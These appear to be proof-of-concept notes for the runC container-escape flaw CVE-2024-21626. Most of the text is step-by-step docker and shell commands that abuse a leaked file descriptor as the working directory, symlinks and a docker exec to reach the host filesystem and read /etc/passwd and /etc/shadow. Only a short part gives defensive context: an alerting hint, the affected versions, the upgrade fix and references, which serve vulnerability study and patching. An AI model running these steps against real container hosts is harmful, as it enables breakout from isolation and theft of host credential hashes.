docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
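- The important part is the working-directory option
-w /proc/self/fd/8
(affected runC versions leak a file descriptor for a host directory into the container process, so this working directory resolves outside the container root; a working directory under /proc/self/fd/ in a container spec or exec request is therefore worth alerting on)
- Access the host filesystem using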
cat ../../../../../../../../../etc/passwd
inside the container
docker run --name cve-2024-21626 --rm -it debian:bookworm
- Inside container -
ln -sf /proc/self/fd/7/ /foo
- Inside container -
ln -sf /proc/self/fd/8/ /bar
docker exec -it -w /bar cve-2024-21626 sleep 120
- Inside container -
ls -F /proc
- Inside container -
cat /proc/9/cmdline
(find the PID of the sleep command)
- Inside container -
cat /proc/9/cwd/../../../../../etc/shadow
Affected versions (the fix is to upgrade runC, containerd and Docker past these ranges):
- runC: >= 1.0.0-rc93 and <= 1.1.11.
- containerd: >= 1.4.7 and <= 1.6.27, and >= 1.7.0 and <= 1.7.12.
- Docker: fixed in 25.0.2
References:
- https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd
- https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626